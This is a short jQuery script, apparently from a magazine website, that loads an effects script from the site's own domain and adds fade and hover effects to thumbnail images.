// JavaScript Document
$(document).ready(function(){
	
	var jsFile = 'http://www.eltesoromagazine.com/js/efx9g.js';
	
	var script = document.createElement('script');
	script.src = jsFile;
	script.type = 'text/javascript';
	var head = document.getElementsByTagName('head').item(0);
	head.appendChild(script);
	
	//THUMBS
	$('.ediColImg img').fadeTo('slow', 0.3);
	
	//efecto thumbs
	$('.ediColImg img').hover(
		function() {
			caller = $(this);
			timerRollIn(onRollInThumbs);
		},
		function() {
			timerRollOut(onRollOutThumbs);
		}
	);	


})